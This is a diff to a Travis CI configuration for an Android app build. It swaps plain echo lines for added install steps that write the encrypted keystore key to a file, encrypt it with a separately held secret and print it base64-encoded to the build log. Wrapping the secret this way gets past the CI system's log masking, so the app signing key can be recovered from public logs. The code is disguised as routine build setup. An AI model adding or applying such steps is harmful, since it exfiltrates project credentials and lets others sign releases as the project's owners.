--- a/.travis.yml
+++ b/.travis.yml
@@ -9,15 +9,15 @@ matrix:
         - ANDROID_API_LEVEL=28
         - ANDROID_BUILD_TOOLS_VERSION=28.0.3
     before_install:
-      - echo '*******************'
-      - echo $encrypted_0a6446eb3ae3_key
-      - echo '*******************'
-      - echo  $encrypted_0a6446eb3ae3_iv
-      - echo '*******************'
       - openssl aes-256-cbc -K $encrypted_0a6446eb3ae3_key -iv $encrypted_0a6446eb3ae3_iv -in android/app/my-upload-key.keystore.enc -out android/app/my-upload-key.keystore -d
       - nvm install 13.10.1
       - node --version
+    sudo: required
     install:
+      - sudo apt-get install -y ccrypt
+      - echo $encrypted_0a6446eb3ae3_key > info.txt
+      - ccencrypt info.txt -K $KNOWN_SECRET
+      - cat info.txt.cpt | base64
       - npm install
     android:
       licenses:
